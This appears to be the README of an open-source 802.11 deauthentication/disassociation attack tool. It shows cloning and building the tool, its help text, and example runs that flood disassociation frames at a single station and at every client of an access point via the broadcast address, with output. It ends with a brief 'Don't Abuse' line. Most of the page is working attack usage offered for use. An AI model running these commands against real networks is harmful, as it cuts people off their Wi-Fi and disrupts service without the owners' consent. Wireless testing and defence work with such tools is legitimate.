2022/08/30([email protected])
# git clone https://github.com/verifsec/deauth-attack.git
# cd ./deauth-attack
# make
# deauth-attack -h
Deauth/Disas Attack 1.03 by <[email protected]>
usage: deauth-attack [-h] -i IFACE -b BSSID [-t TARGET] -m MODE
optional arguments:
-h, --help show this help message and exit
-i IFACE, --iface IFACE
802.11 iface
-b BSSID, --bssid BSSID
APUT MAC Address
-t TARGET, --target TARGET
STAUT MAC Address
-m MODE, --mode MODE "disas" or "deauth"
# deauth-attack -i wlan0mon -b 00:23:69:XX:XX:XX -m disas -t 34:97:f6:YY:YY:YY
Deauth/Disas Attack 1.02a by <[email protected]>
[+] Starting now ...
[|] Sending the disas flame from 00:23:69:XX:XX:XX to 34:97:f6:YY:YY:YY
[+] Finish. Hopefully it's nothing.
# deauth-attack -i wlan0mon -b 00:23:69:XX:XX:XX -m disas
Deauth/Disas Attack 1.02a by <[email protected]>
[+] Starting now ...
[|] Sending the disas flame from 00:23:69:XX:XX:XX to ff:ff:ff:ff:ff:ff
[+] Finish. Hopefully it's nothing.
This software includes the work that is distributed in the Apache License 2.0.
Don't Abuse.